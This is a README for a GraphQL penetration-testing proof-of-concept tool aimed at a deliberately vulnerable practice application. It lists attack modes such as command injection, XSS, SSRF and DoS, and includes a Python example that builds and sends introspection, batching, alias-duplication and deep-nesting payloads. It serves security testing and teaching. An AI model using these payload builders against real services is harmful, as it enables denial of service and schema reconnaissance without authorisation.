An automated tool for discovering vulnerabilities in GraphQL applications through fuzzing techniques, including OS Command Injection and XSS, with a focus on OWASP Top Ten vulnerabilities.
mrmtwoj/GraphQL_exploitation
GraphQL Exploitation PoC Tool

Overview

This tool is designed to test and explore vulnerabilities in GraphQL applications. It allows users to perform various types of attacks and retrieve information about the GraphQL schema. The tool also includes references to the OWASP Top Ten vulnerabilities to educate users about common security risks.

Acyber Team Developer

Automatic PoC For Damn Vulnerable GraphQL Application.

Features

  • Perform GraphQL introspection to discover the schema.
  • Execute batch queries (several operations bundled into one HTTP request).
  • Test for OS Command Injection vulnerabilities.
  • Conduct Stored Cross-Site Scripting (XSS) tests.
  • Analyze resource-intensive queries.
  • Simulate Denial of Service (DoS) attacks.
  • Check for field duplication vulnerabilities.
  • Test for Server-Side Request Forgery (SSRF).
  • Send custom GraphQL requests.

OWASP Top Ten Vulnerabilities

The tool provides information about the OWASP Top Ten vulnerabilities (the 2017 edition of the list):

  1. Injection
  2. Broken Authentication
  3. Sensitive Data Exposure
  4. XML External Entities (XXE)
  5. Broken Access Control
  6. Security Misconfiguration
  7. Cross-Site Scripting (XSS)
  8. Insecure Deserialization
  9. Using Components with Known Vulnerabilities
  10. Insufficient Logging & Monitoring

Installation

To run this tool, you need to have Python 3.x installed. You can download it from the official Python website.

Dependencies

Install the required libraries using pip:

pip install requests colorama

Usage

Run the tool with the following command:

python3 graphql_poc.py -u <GraphQL_endpoint_URL> -p <Proxy_URL>

Arguments

  • -u / --url: The GraphQL endpoint URL you want to test.
  • -p / --proxy: (Optional) The proxy URL for intercepting requests (e.g., http://127.0.0.1:8080).

Example

python3 graphql_poc.py -u http://example.com/graphql -p http://127.0.0.1:8080

Attack Types

After running the tool, you will be prompted to select an attack type:

  • GraphQL Introspection: Discover the GraphQL schema.
  • Batch Query Attack: Send multiple queries at once.
  • OS Command Injection: Test for command injection vulnerabilities.
  • Stored Cross-Site Scripting (XSS): Test for stored XSS vulnerabilities.
  • Resource Intensive Query: Test a resource-intensive query.
  • Denial of Service Attack: Simulate a DoS attack.
  • Field Duplication Attack: Test for duplicate fields in queries.
  • Server-Side Request Forgery (SSRF): Test for SSRF vulnerabilities.
  • Custom GraphQL Request: Send a custom GraphQL request.
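The following is an added example, not code from the GraphQL_exploitation project, showing how the payloads behind four of the attack types above (introspection, batch query, field/alias duplication, resource-intensive nesting) are built, and how an introspection reply is parsed into a type-to-fields map. Only the `requests` library the README already installs is used, and only inside send_graphql(); the sample introspection response and every type and field name in it are constructed for the example and do not describe any real schema.

```python
"""Build GraphQL attack payloads and parse an introspection reply offline."""
import json
from typing import Dict, List, Optional

try:
    import requests  # only needed by send_graphql(); the rest runs offline
except ImportError:  # pragma: no cover
    requests = None

# Minimal introspection query: enough to enumerate types, their fields and the
# root operation types without pulling the whole schema document.
INTROSPECTION_QUERY = """
query IntrospectionProbe {
  __schema {
    queryType { name }
    mutationType { name }
    types { name kind fields { name } }
  }
}
"""


def introspection_payload() -> dict:
    """JSON body for a POST that asks the server for its schema."""
    return {"query": INTROSPECTION_QUERY}


def batch_payload(queries: List[str]) -> List[dict]:
    """Query batching: a JSON array of operations in one HTTP request.
    Servers that accept it let one request carry many operations, which
    multiplies work per request and sidesteps per-request rate limits."""
    return [{"query": q} for q in queries]


def alias_duplication_query(root_field: str, inner_fields: str, copies: int) -> str:
    """Repeat one field `copies` times under distinct aliases in a single
    operation. Aliases are needed because GraphQL merges identical unaliased
    selections, so plain duplication would not multiply server work."""
    selections = "\n".join(
        f"  a{i}: {root_field} {{ {inner_fields} }}" for i in range(copies)
    )
    return f"query Dup {{\n{selections}\n}}"


def nested_query(root: str, link: str, depth: int, leaf: str = "id") -> str:
    """Circular-relationship nesting: root { link { link { ... leaf } } }.
    Without a depth limit, resolver cost grows with every level."""
    body = leaf
    for _ in range(depth):
        body = f"{link} {{ {body} }}"
    return f"query Deep {{ {root} {{ {body} }} }}"


def parse_introspection(response: dict) -> Dict[str, List[str]]:
    """Map each user-defined OBJECT type to its field names, dropping the
    built-in __ types. Returns {} when introspection is disabled or errored."""
    schema = (response.get("data") or {}).get("__schema")
    if not schema:
        return {}
    return {
        t["name"]: [f["name"] for f in (t.get("fields") or [])]
        for t in schema["types"]
        if t["kind"] == "OBJECT" and not t["name"].startswith("__")
    }


def mutation_type(response: dict) -> Optional[str]:
    """Name of the root mutation type, or None if the schema has none."""
    schema = (response.get("data") or {}).get("__schema") or {}
    mt = schema.get("mutationType")
    return mt["name"] if mt else None


def send_graphql(url: str, payload, proxy: Optional[str] = None) -> dict:
    """POST a payload (single dict or batch list) to the endpoint, optionally
    through an intercepting proxy such as the one passed with -p."""
    if requests is None:
        raise RuntimeError("pip install requests")
    proxies = {"http": proxy, "https": proxy} if proxy else None
    r = requests.post(url, json=payload, proxies=proxies, timeout=15)
    r.raise_for_status()
    return r.json()


# Constructed sample reply: the shape matches a real __schema response,
# the type and field names are hypothetical.
SAMPLE_RESPONSE = {
    "data": {
        "__schema": {
            "queryType": {"name": "Query"},
            "mutationType": {"name": "Mutation"},
            "types": [
                {"name": "Query", "kind": "OBJECT",
                 "fields": [{"name": "users"}, {"name": "me"}]},
                {"name": "Mutation", "kind": "OBJECT",
                 "fields": [{"name": "createUser"}, {"name": "deleteUser"}]},
                {"name": "User", "kind": "OBJECT",
                 "fields": [{"name": "id"}, {"name": "friends"}]},
                {"name": "String", "kind": "SCALAR", "fields": None},
                {"name": "__Schema", "kind": "OBJECT", "fields": [{"name": "types"}]},
            ],
        }
    }
}

if __name__ == "__main__":
    print("mutation type:", mutation_type(SAMPLE_RESPONSE))
    for name, fields in parse_introspection(SAMPLE_RESPONSE).items():
        print(f"{name}: {', '.join(fields)}")
    print(alias_duplication_query("users", "id", 3))
    print(nested_query("users", "friends", 4))
    print(json.dumps(batch_payload(["{ __typename }"] * 2)))
```

Against a live target, replace the sample with `send_graphql(url, introspection_payload(), proxy)`; if `parse_introspection` returns an empty map, the server has disabled introspection (or returned errors) and the remaining payloads have to be built from field names obtained elsewhere.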

Contributing

Contributions are welcome! If you have suggestions for improvements or new features, please open an issue or submit a pull request.

Related Project

For a vulnerable GraphQL application to test against, check out the Damn Vulnerable GraphQL Application.

License

This project is licensed under the MIT License.

Disclaimer

This tool is intended for educational purposes and ethical hacking only. Use it responsibly and only on systems you have permission to test.
